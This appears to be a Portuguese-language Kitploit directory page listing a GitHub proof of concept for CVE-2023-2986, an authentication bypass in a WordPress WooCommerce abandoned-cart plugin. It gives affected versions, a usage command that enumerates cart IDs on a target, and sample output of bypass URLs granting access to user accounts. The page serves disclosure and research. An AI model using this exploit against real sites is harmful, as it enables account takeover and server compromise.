Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-2986 — Prova de Conceito para a vulnerabilidade CVE-2023-2986 no Plugin 'Abandoned Cart Lite for WooCommerce' no WordPress | Kitploit
Ferramentas/GitHubGitHub/ayantaker/cve-2023-2986
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubayantaker/cve-2023-2986

CVE-2023-2986

Prova de Conceito para a vulnerabilidade CVE-2023-2986 no Plugin 'Abandoned Cart Lite for WooCommerce' no WordPress

Ver Repositório
63há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito Original para CVE-2023-2986

Prova de Conceito para a vulnerabilidade CVE-2023-2986 no plugin 'Abandoned Cart Lite for WooCommerce' no WordPress

Detalhes Relacionados

  • Link NVD : https://nvd.nist.gov/vuln/detail/CVE-2023-2986
  • Fonte do Plugin : https://github.com/TycheSoftwares/woocommerce-abandoned-cart/
  • Versões vulneráveis : version <= 5.14.2 version <= 5.15.1
  • Versão corrigida : 5.15.0 5.15.2

Atualização

  • Pensava-se que a versão 5.15.0 corrigia o problema, mas descobri que não foi completamente corrigida e o mesmo foi atualizado. Portanto, a versão corrigida real é 5.15.2

Análise de Vulnerabilidade

  • Blogs da Keysight : https://www.keysight.com/blogs/tech/nwvs/2023/08/23/cve-2023-2986
  • Medium : https://medium.com/keysight-ati/cve-2023-2986-wordpress-plugin-vulnerability-and-the-importance-of-poc-7c9c5122438b

Uso

root@kitploit:~
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
root@kitploit:~
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5

Inserir a URL no navegador dará acesso à conta do usuário respectivo. Se o próprio usuário administrador do WordPress tiver uma entrada, isso dará acesso ao console de administração, levando ao comprometimento total do servidor WordPress.

Aviso Legal

Esta Prova de Conceito (POC) foi criada puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usada para atacar sistemas, exceto quando explicitamente autorizado. O autor não é responsável por qualquer uso indevido da POC. Use com responsabilidade.

Baixar ferramenta